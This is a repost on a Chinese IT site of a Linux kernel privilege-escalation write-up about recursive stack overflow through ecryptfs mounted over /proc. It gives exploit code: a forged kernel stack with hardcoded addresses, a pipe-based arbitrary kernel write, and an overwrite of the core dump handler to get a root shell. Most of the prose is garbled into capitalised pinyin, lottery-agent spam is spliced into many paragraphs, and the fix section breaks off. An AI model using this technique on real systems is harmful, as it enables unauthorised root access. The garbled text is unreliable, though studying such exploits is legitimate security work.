荣耀彩票代理

IT技术互动交流平台

Linux内核中的递归漏洞利用

发布日期:2016-06-30 22:25:39

背景知识

Linux荣耀彩票代理系统中,用户态的栈空间通常大约是8MB。如果有程序发生了栈溢出的话(比如无限递归),栈所在的内存保护页一般会捕捉到。

Linux内核栈(可以用来处理系统调用)和用户态的栈很不一样。内核栈相对来说更短:32位x86架构平台为4096byte , 64位系统则有16384byte(内核栈大小由THREAD_SIZE_ORDER 和 THREAD_SIZE 确定)。它们是由内核的伙伴内存分配器分配,伙伴内存分配器是内核常用来分配页大小(以及页大小倍数)内存的分配器,它不创建内存保护页。也就是说,如果内核栈溢出的话,它将直接覆盖正常的数据。正因如此,内核代码必须(通常也是)在栈上分配大内存的时候非常小心,并且必须阻止过多的递归。

Linux上的大多数文件系统既不用底层设备(伪文件系统,比如sysfs, procfs, tmpfs等),也不用块设备(一般是硬盘上的一块)作为备用存储设备。然而, ecryptfs 和overlayfs是例外。这两者是堆叠的文件系统,这种文件系统会使用其他文件系统上的文件夹作为备用存储设备(overlayfs则使用多个不同文件系统上的多个文件作为备用存储设备)。被用作备用存储设备的文件系统称为底层文件系统,其上的文件称为底层文件。这种层叠文件系统的特点是它或多或少的会访问底层文件系统,并对访问的数据做一些修改。 Overlayfs融合多个文件系统,ecryptfs则进行了相应的加密。

CENGDIEWENJIANXITONGSHIJISHANGCUNZAIQIANZAIFENGXIAN,YINWEIQIFANGWENXUNIWENJIANXITONGDEHANSHUCHANGHUIFANGWENDAODICENGWENJIANXITONGDEHANSHU,XIANGJIAOZHIJIEFANGWENDICENGWENJIANXITONGDEJUBING,ZHEIHUIZENGDAZHANKONGJIAN。KAOLVZHEIYANGYIGECHANGJING:RUGUOYONGCENGDIEWENJIANXITONGZUOWEILINGWAIYIGECENGDIEXITONGDEBEIYONGCUNCHUSHEBEI,YOUYUMEIYICENGWENJIANXITONGDEDUIDIEDOUZENGDALEZHANKONGJIAN,NEIHEZHANJIUHUIZAIMOUXIEQINGKUANGXIAYICHU。DANSHI,SHEZHIFILESYSTEM_MAX_STACK_DEPTH XIANZHIWENJIANXITONGDECENGSHU,ZHIYUNXUZUIDUOLIANGCENGCENGDIEWENJIANXITONGFANGZAIFEICENGDIEWENJIANXITONGSHANG,JIUKEYIBIMIANZHEIGEWENTI。

荣耀彩票代理ZAIProcfsWEIWENJIANXITONGSHANG,XITONGZHONGYUNXINGDEMEIYIGEJINCHENGDOUYOUYIGEWENJIANJIA,MEIGEWENJIANJIABAOHANYIXIEMIAOSHUGAIJINCHENGDEWENJIAN。ZHIDEZHUYIDESHIMEIGEJINCHENGDE“mem”,“ environ”HE“cmdline”WENJIAN,YINWEIFANGWENZHEIXIEWENJIANHUITONGBUFANGWENMUBIAOJINCHENGDEXUNINEICUN。ZHEIXIEWENJIANXIANSHILEBUTONGDEXUNINEICUNDIZHIFANWEI:

 

1.“mem”WENJIANXIANSHILEZHENGGEXUNINEICUNDIZHIFANWEI(XUYAOPTRACE_MODE_ATTACH QUANXIAN)

荣耀彩票代理2.“environ”WENJIANXIANSHILEmm->env_start DAOmm->env_endDENEICUNFANWEI(XUYAOPTRACE_MODE_READQUANXIAN)

荣耀彩票代理3.“cmdline”WENJIANXIANSHILEmm->arg_start DAOmm->arg_endDEDIZHIFANWEI(RUGUOmm->arg_endDEQIANYIGEZIFUSHInull DEHUA)

荣耀彩票代理RUGUOKEYIYONGmmap()HANSHUYINGSHE“mem”WENJIANDEHUA(SHAYIYIYEMEIYOU,BIEXIANGTAIDUO),JIUKEYIYINGSHECHENGRUXIATUSUOSHIDEYANGZI:

 

word-wrap: break-word; word-break: break-all; font-size: 8pt;">

JIEXIALAI,JIASHE/proc/$pid/memDEYINGSHEYOUYIXIECUOWU,NEIMEZAIJINCHENGCLIDENEICUNDUQUCUOWU,JIANGHUIDAOZHICONGJINCHENGBZHONGYINGSHEDENEICUNCHUCUO,JINERDAOZHIJINCHENGBLICHUXIANQITADENEICUNCUOWU,JINERDAOZHICONGAJINCHENGYINGSHEDENEICUNCHUCUO,ZHEIJIUSHIYIGEDIGUINEICUNCUOWU。

荣耀彩票代理KESHI,XIANSHIZHONGZHEISHIBUKEXINGDE,“mem”,“environ”,“cmdline ”WENJIANZHINENGYONGVFSHANSHUDUXIE,mmapWUFASHIYONG:

 

staticconst struct file_operations proc_pid_cmdline_ops = {

 .read   = proc_pid_cmdline_read,

 .llseek = generic_file_llseek,

};

[...]

staticconst struct file_operations proc_mem_operations = {

 .llseek  = mem_lseek,

 .read    = mem_read,

 .write   = mem_write,

 .open    = mem_open,

 .release = mem_release,

};

[...]

staticconst struct file_operations proc_environ_operations = {

 .open    = environ_open,

 .read    = environ_read,

 .llseek  = generic_file_llseek,

 .release = mem_release,

};

 

XIANGGUANecryptfsWENJIANXITONG,BIJIAOYOUQUDEYIGEXIJIEZAIYUTAZHICHImmap()。YONGHUKANDAODENEICUNYINGSHEBIXUSHIJIEMIDE,ERDICENGWENJIANXITONGDENEICUNYINGSHESHIJIAMIDE,YINERecryptfs WENJIANXITONGBUNENGJIANGmmap()HANSHUZHIJIEYINGSHEDAODICENGWENJIANXITONGDEmmap()HANSHUSHANG。Ecrypt WENJIANXITONGZAINEICUNYINGSHESHISHIYONGLEZIJIDEYEHUANCUN。

荣耀彩票代理ecryptfsWENJIANXITONGCHULIYECUOWUDESHIHOU,BIXUYIMOUZHONGFANGSHIDUQUDICENGWENJIANXITONGSHANGJIAMIDEYE。ZHEIKEYITONGGUODUQUDICENGWENJIANWENJIANXITONGDEYEHUANCUN(SHIYONGDICENGWENJIANXITONGDEmmapHANSHU)LAISHIXIAN,DANSHIZHEIYANGBIJIAOXIAOHAONEICUN。YUSHITAZHIJIESHIYONGDICENGWENJIANXITONGDE VFSDUQUHANSHU(TONGGUOkernel_read()),ZHEIYANGZUOGENGJIAZHIJIEYOUXIAO,DANSHIZHEIGEZUOFAYOUFUZUOYONG,JIUSHIYOUKENENGHUImmap() DAOTONGCHANGBUNENGYINGSHEDEJIEMIHOUDEWENJIAN(YINWEIZHIYAODICENGWENJIANYOUDUQUANXIANBINGQIEBAOHANHEFADEJIAMISHUJU, ecryptfsWENJIANXITONGDEmmapHANSHUJIUNENGGONGZUO)。

漏洞分析

ZAICI,WOMENJIUNENGMIAOHUIWANZHENGDEGONGJIFANGSHILE。SHOUXIANCHUANGJIANYIGEJINCHENGA,JINCHENGHAOWEI$A。RANHOUCHUANGJIANYIGEecrypptfs GUAZAI/tmp/$A,SHI/proc/$AZUOWEITADEDICENGWENJIANXITONG(ecryptfs YINGGAIZHIYOUYIGE key,ZHEIYANGWENJIANMINGCAIBUHUIBEIJIAMI)。XIANZAI,RUGUO/proc/$AXIAXIANGYINGDEWENJIANYOUHEFADEecryptfs WENJIANTOUDEHUA,NEIME /tmp/$A/mem, /tmp/$A/environ HE /tmp/$A/cmdlineJIUKEYIBEIYINGSHE。CHUFEIYOU root QUANXIAN,FOUZEWUFAJIANGNEICUNYINGSHEDAOJINCHENG ADE0×0CHU,YEJIUSHI /proc/$A/mem DEKAITOU。YINCICONGKAISHIDUQU /proc/$/A ZONGSHIHUIFANHUI-EIO,ERQIE /proc/$A/mem BUHUIYOUYIGEHEFADE ecryptfs WENJIANTOU。RUCI,environ HE cmdline WENJIANCAIYOUGONGJIDEKENENGXING。

ZAISHIYONGCONFIG_CHECKPOINT_RESTOREBIANYIDENEIHE(ZHISHAOSHIUbuntuDE distro NEIHE)ZHONG,FEITEQUANYONGHUKEYITONGGUOprctl(PR_SET_MM, PR_SET_MM_MAP, &mm_map,sizeof(mm_map), 0)SHEZHImm_struct ZHONGDE arg_start, arg_end, env_start HE env_endZHI。ZHEISHIDEYINGSHE /proc/$A/environ HE /proc/$A/cmdlineDAORENYIXUNINEICUNFANWEICHENGWEIKENENG。(BUZHICHIcheckpoint-restoreDENEIHEZHONG,GONGJIGUOCHENGJIUSHAOWEIYOUDIANMAFAN,DANSHIYONGSUOXUDECANSHUQUYUHEHUANJINGBIANLIANGDEZHANGDUZHONGXINZHIXING,RANHOUQUDAIBUFENZHANKONGJIANDEYINGSHE,HAISHIYOUKENENGDE。)

RUGUOYIGEYOUXIAOJIAMIDEecryptfsWENJIANBEIJIAZAIDAOJINCHENGADENEICUNZHONG,BINGQIETADEHUANJINGBIANLIANGYEBEIPEIZHIWEIZHIXIANGZHEIKUAIQUYU,NEIMEHUANJINGBIANLIANGQUYULIDEJIEMIXINGSHIDESHUJUJIUKEYIZAI /tmp/$A/environWENJIANZHONGHUOQU。ZHEIGEWENJIANYEKEYIBEIYINGSHEDAOJINCHENGBDENEICUNZHONG。WEILENENGGOUZHONGFUGAIJINCHENG,MOUXIESHUJUXUYAOFANFUJIAMI,JINERCHUANGJIANYIGEJIAMIDEmatroska WENJIAN,BINGJIANGZHEIGEWENJIANJIAZAIDAOJINCHENG ADENEICUNZHONG。ZHEIYANGYILAI,YINGSHEHUXIANGJINCHENGJIEMIHUANJINGBIANLIANGQUYUDEJINCHENGLIANJIUJIANLIQILAILE:

 

 

 

 

 

如果映射到进程C和进程B的内存相应范围内没有数据,进程C 中的内存错误(这个内存错误可能是用户空间产生也可能是由于用户空间访问内核空间,比如通过copy_from_user()函数)将会导致ecryptfs读取 /proc/$B/environ ,进而导致进程B中的内存错误,接下来导致ecryptfs读取 /proc/$A/environ ,最后导致进程A中的进程错误。如此循环往复,最终溢出内核栈,使内核崩溃。内核栈如下:

 

[...]

[<ffffffff811bfb5b>]handle_mm_fault+0xf8b/0x1820

[<ffffffff811bac05>]__get_user_pages+0x135/0x620

[<ffffffff811bb4f2>]get_user_pages+0x52/0x60

[<ffffffff811bba06>]__access_remote_vm+0xe6/0x2d0

[<ffffffff811e084c>]? alloc_pages_current+0x8c/0x110

[<ffffffff811c1ebf>]access_remote_vm+0x1f/0x30

[<ffffffff8127a892>]environ_read+0x122/0x1a0

[<ffffffff8133ca80>]? security_file_permission+0xa0/0xc0

[<ffffffff8120c1a8>]__vfs_read+0x18/0x40

[<ffffffff8120c776>]vfs_read+0x86/0x130

[<ffffffff812126b0>]kernel_read+0x50/0x80

[<ffffffff81304d53>]ecryptfs_read_lower+0x23/0x30

[<ffffffff81305df2>]ecryptfs_decrypt_page+0x82/0x130

[<ffffffff813040fd>]ecryptfs_readpage+0xcd/0x110

[<ffffffff8118f99b>]filemap_fault+0x23b/0x3f0

[<ffffffff811bc120>]__do_fault+0x50/0xe0

[<ffffffff811bfb5b>]handle_mm_fault+0xf8b/0x1820

[<ffffffff811bac05>]__get_user_pages+0x135/0x620

[<ffffffff811bb4f2>]get_user_pages+0x52/0x60

[<ffffffff811bba06>]__access_remote_vm+0xe6/0x2d0

[<ffffffff811e084c>]? alloc_pages_current+0x8c/0x110

[<ffffffff811c1ebf>]access_remote_vm+0x1f/0x30

[<ffffffff8127a892>]environ_read+0x122/0x1a0

[...]

 

GUANYUZHEIGELOUDONGDEKELIYONGXING:LIYONGGAILOUDONG,XUYAONENGGOUGUAZAI/proc/$pidWEIecryptfsWENJIANXITONG。ANZHUANGWANecryptfs-utilsBAOZHIHOU(RUGUOANZHUANGUbuntuSHIXUANZELEhomeMULUJIAMI, Ubuntu HUIZIDONGANZHUANG),SHIYONG /sbin/mount.ecryptfs_SIYOUDEsetuidFUZHUHANSHUJIUKEYIZUODAOZHEIYIDIAN。

漏洞利用

JIEXIALAIDEMIAOSHUSHIPINGTAIXIANGGUANDE,ZHEILIZHIamd64。

YIQIANYAOLIYONGZHEIYILEILOUDONGHAISHIXIANGDANGJIANDANDE,KEYIZHIJIEFUGAIZHANDIDEthread_infoJIEGOUTI,YONGHESHIDESHUZHIZHONGXIErestart_blockHUOZHE addr_limit,RANHOUGENJUSUOYONGFANGSHI,XUANZEZHIXINGYONGHUKONGJIANYINGSHEDEDAIMA,HAISHIYONGcopy_from_user() HE copy_to_user() ZHIJIEDUXIENEIHESHUJU。

DANSHI,restart_blockYIJINGCONGthread_infoJIEGOUTIZHONGYICHU,BINGQIEYOUYUZHANYICHUCHUFASHIZHANZHONGYOU kernel_read() DEZHANZHEN,SUOYIaddr_limitYIJINGSHIKERNEL_DS,ERQIEHANSHUTUICHUSHIJIANGHUIZHONGZHICHENG USER_DS 。LINGWAI, Ubuntu 16.04YIHOUDENEIHEDOUDAKAILECONFIG_SCHED_STACHK_END_CHECK NEIHEPEIZHIXUANXIANG。DAKAIZHEIGEXUANXIANGYIHOU,MEICIDIAODUDAOZHEIGEXIANCHENGSHI, thread_info JIEGOUTISHANGFANGDEJINSIQUEZHIDOUHUIBEIJIANCHA;RUGUOJINSIQUEZHIBUZHENGQUEDEHUA,NEIHEDIGUIJIUHUICHUCUORANHOUBENGKUI。

YOUYUthread_infoJIEGOUTIZHONGHENNANZHAODAOYOUJIAZHIDEGONGJIMUBIAO(TONGSHIYICHUthread_infoZHONGDESHUJUBINGFEIYOUXIAODEHUANJIECUOSHI),WOJIUXUANZELEQITAFANGSHI:YICHUZHANDAOZHANZHIQIANDEKONGJIAN,RANHOULIYONGZHANHEQITANEICUNKONGJIANZHIJIANHUIZHONGHEZHEIYIDIAN。ZHEIZHONGFANGSHIDEWENTIJIUSHIYIDINGYAOBAOZHENGJINSIQUEZHIHE thread_infoJIEGOUZHONGDEQITACHENGYUANBUBEIFUGAI。ZHANYICHUDENEICUNBUJURUXIASUOSHI(LVSEBIAOSHIKEYIFUGAI,HONGSEBIAOSHIBUNENGFUGAI,HUANGSEBIAOSHIFUGAIHOUKENENGHUIYOUWENTI):

 

 

 

 

 

 

 

 

XINGYUNDESHI,YOUXIEZHANZHENZHONGCUNZAIKONGDONG(RUGUODIGUIDEZUIDIBUCAIYONGcmdlineERBUSHIenviron),DIGUIDEGUOCHENGZHONGJIUHUIYOUYIGE5GEQWORDKONGDONGMEIYOUBEIFANGWENDAO。ZHEIXIEKONGDONGZUGOUYONGLAICUNFANGCONGSRACK_END_MAICDAOflagsDESUOYOUSHUJU。ZHEIYIDIANKEYITONGGUOYIGEANQUANDIGUIHEYIGENEIHEDIAOSHIMOKUAILAISHIXIAN,ZHEIGENEIHEDIAOSHIMOKUAIJIANGZHANZHONGDESUOYOUKONGDONGBIAOLVBIANYUGUANCHA:

 

 

 

 

 

 

 

 

JIEXIALAIDEWENTISHIKONGDONGZHIHUICHUXIANZAITEDINGDEWEIZHI,ERLOUDONGLIYONGJIUXUYAOKONGDONGZAIZHUNQUEDEWEIZHICHUXIAN。XIAMIANYOUYIXIEJIQIAOKEYIYONGLAIDUIQIZHANKONGJIAN:

 

1.ZAIMEIGEDIGUICENGSHANGDOUKEYIXUANZE“environ”WENJIANHUOZHE“cmdline”WENJIAN,TAMENDEZHANZHENDAXIAOHEKONGDONGMOSHIDOUBUYIYANG。

2.RENHEDIAOYONGcopy_from_user()DOUHUIDAOZHINEICUNCUOWU。SHENZHIKEYIJIANGXIERUXITONGDIAOYONGHEVFSXIERUJUBINGJIEHEQILAI,SUOYIMEIYIGEXIERUXITONGDIAOYONGHE VFSXIERUJUBINGDOUHUIYINGXIANGSHENDU(HEBINGSHENDUKEYIJISUANCHULAI,ERBUYONGCESHIMEIGEBIANLIANG)。

ZAICESHILEGEZHONGZUHEZHIHOU,WOZHAODAOYIZUenvironWENJIANHEcmdlineWENJIAN, HAIYOUwrite ()XITONGDIAOYONGHEJINCHENGDEVFSXIEJUBINGDEZUHE。

SUIHOU,JIUKEYIDIGUIDAOZHIQIANFENPEIDEKONGJIAN,ERBUHUIFUGAIRENHEWEIXIANSHUJULE。RANHOUZANTINGNEIHEXIANCHENGDEZHIXING,CISHIZHANZHIZHENZHIXIANGZHIQIANFENPEIDENEICUNKONGJIAN,ZHEIXIENEICUNKONGJIANYINGGAIYONGXINDEZHANLAIFUGAI,RANHOUJIXUNEIHEXIANCHENGDEZHIXING。

荣耀彩票代理WEILEZANTINGDIGUIZHONGNEIHEXIANCHENGDEZHIXING,ZAIJIANLIQIYINGSHELIANHOU,YINGSHELIANZUIHOUDEannonymousYINGSHEKEYIYONGFUSEYINGSHEQUDAI( userfaultfd HANSHUBINGBUSHIYONG,TABUNENGBUZHUOYUANCHENGDENEICUNFANGWEN)。

DUIYUXIANQIANFENPEIDENEICUN,WODEexpSHIYONGGUANDAO(Pipes)。DANGXIERUSHUJUDAOXINFENPEIDEKONGGUANDAOSHI,HUOBANNEICUNFENPEIQIHUIFENPEIYIGENEICUNYE,LAICUNFANGZHEIXIESHUJU。WODEexpTONGGUOGUANDAONEICUNYEFENPEILAITIANCHONGDALIANGNEICUN,SUOYISHIYONGclone()CHUANGJIANXINJINCHENGSHIJIUHUICHUFANEICUNCUOWU。ZHEILISHIYONGclone() ERFEIfork(),YINWEIDIAOYONGclone()SHIZHIYAOKONGZHIHAOCANSHU,XITONGJIUHUIFUZHIJIAOSHAODEXINXI,KEYIJIANSHAONEICUNFENPEIDEGANRAO。 Clone( ) HANSHUDIAOYONGGUOCHENGZHONG,SUOYOUDEGUANDAONEICUNYEDOUBEITIANCHONGMAN,CHULEDIYICIBAOCUNDE RIPZHI——DIGUIJINCHENGZANTINGZAIFUSEZHONGSHI,TABAOCUNZAIQIWANGDE RSP ZHIZHIHOU。XIERUJIAOSHAODESHUJUJIUNENGZHISHIDIERGEGUANDAOXIERUMUBIAOZHANSHUJU,ZHEIXIESHUJUZAI RIPKONGZHISHIXIANZHIQIANJIUBEISHIYONG,KENENGHUIDAOZHINEIHEBENGKUI。SUIHOU,DIGUIJINCHENGZAIFUSE ZHONGZANTINGSHI,DIERCIXIANGSUOYOUGUANDAOXIERUSHUJU,HUIFUGAIBAOCUNDE RIPZHIHEQIHOUDESHUJU,GONGJIZHEYEJIUNENGGOUWANQUANKONGZHIQUANXINDEZHANLE。

 

 

 

 

荣耀彩票代理CISHI,ZUIHOUYIDAOFANGXIANJIUSHIKASLRLE。UbuntuZHICHIKASLR ,ZHIBUGUOKASLRXUYAOSHOUDONGKAIQI。ZHEIGEbZUIJINGAIBUGYIJINGXIUFULE,XIANZAIdistrosNEIHEYINGGAISHIMORENJIUKAIQIKASLRDE。SUISHUOZHEIXIANGANQUANTEXINGBANGBUSHANGTAIDADEMANG,DANBIJINGKASLRBUXUYAOZHANYONGTAIDUOZIYUAN,KAIQIZHEIXIANGTEXINGJIUXIANDEXIANGDANGLISUODANGRANLE。YOUYUDADUOSHUDESHEBEIBINGBUZHICHIXIANGNEIHEMINGLINGXINGCHUANSHUTESHUCANSHU,SUOYIZHEILIJIASHEKASLRSUIRANBIANYIJINLENEIHE,DANRENGCHUYUWEIJIHUOZHUANGTAI,GONGJIZHEYEZHIDAONEIHEDAIMAHEJINGTAISHUJUDEDIZHI。

RANHOUJIUKEYIYONGROPZAINEIHELIZUOGEZHONGSHIQINGLE,LOUDONGLIYONGJUTIYOULIANGGEFANGXIANGKEYIJIXU。KEYISHIYONGROPJINXING commit_creds LEISICAOZUO。BUGUOWOYONGLELINGYIGEFANGFA。ZAIZHANYICHUGUOCHENGZHONG,YUANLAIaddr_limitDEKERNEL_DS ZHIBAOCUNLEQILAI。ZHANYICICIFANHUI,ZUIZHONGJIANGHUIBA addr_limit ZHONGZHIWEIUSER_DS。DANRUGUOWOMENZHIJIEFANHUIDAOYONGHUKONGJIAN, addr_limit JIANGBAOCHI KERNEL_DS 。SUOYIWOZHEIYANGGOUZAOXINZHAN,HUODUOHUOSHAOFUZHILEZHANDINGDESHUJU:

 

unsigned longnew_stack[] = {

 0xffffffff818252f2,/* return pointer of syscall handler */

 /* 16 uselessregisters */

 0x1515151515151515,0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

 (unsignedlong) post_corruption_user_code, /* user RIP */

 0x33, /* userCS */

 0x246, /*EFLAGS: most importantly, turn interrupts on */

 /* user RSP*/

 (unsignedlong) (post_corruption_user_stack + sizeof(post_corruption_user_stack)),

 0x2b /* userSS */

};

 

荣耀彩票代理SHADIAOFUSEFUWUJINCHENGHOU,DIGUIJINCHENGJIXUYUNXINGDAOpost_corruption_user_codeHANSHUSHANG。ZHEIGEHANSHUKEYISHIYONGGUANDAOXIANGRENYINEIHEDIZHIXIESHUJU,YINWEI copy_to_user()ZHONGDEDIZHIJIANCHAYIJINGSHIXIAO。

 

voidkernel_write(unsigned long addr, char *buf, size_t len) {

  int pipefds[2];

  if (pipe(pipefds))

    err(1, 'pipe');

  if (write(pipefds[1], buf, len) != len)

    errx(1, 'pipe write');

  close(pipefds[1]);

  if (read(pipefds[0], (char*)addr, len) !=len)

    errx(1, 'pipe read tokernelspace');

  close(pipefds[0]);

}

 

荣耀彩票代理XIANZAINIJIUKEYIZAIYONGHUTAISHUFUDIZHIXINGRENYIDUXIECAOZUOLE。RUGUONIXIANGYAOroot shell,KEYIFUGAIcoredumpHANSHU,TACUNCHUZAIYIGEJINGTAIBIANLIANGLI,RANHOUCHUFAYIGE SIGSEGV,JIUKEYIYIrootQUANXIANZHIXINGcoredumpHANSHU:

 

 char*core_handler = '|/tmp/crash_to_root';

 kernel_write(0xffffffff81e87a60,core_handler, strlen(core_handler)+1);

 

漏洞修复

YOULIANGGEDULIDEBUDINGKEYONGYUXIUFUGAIBUG:QIZHONG,2f36db710093 JINZHITONGGUOecryptfsDAKAIMEIYOUmmapHANSHUDEWENJIAN,

Tag标签:         
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规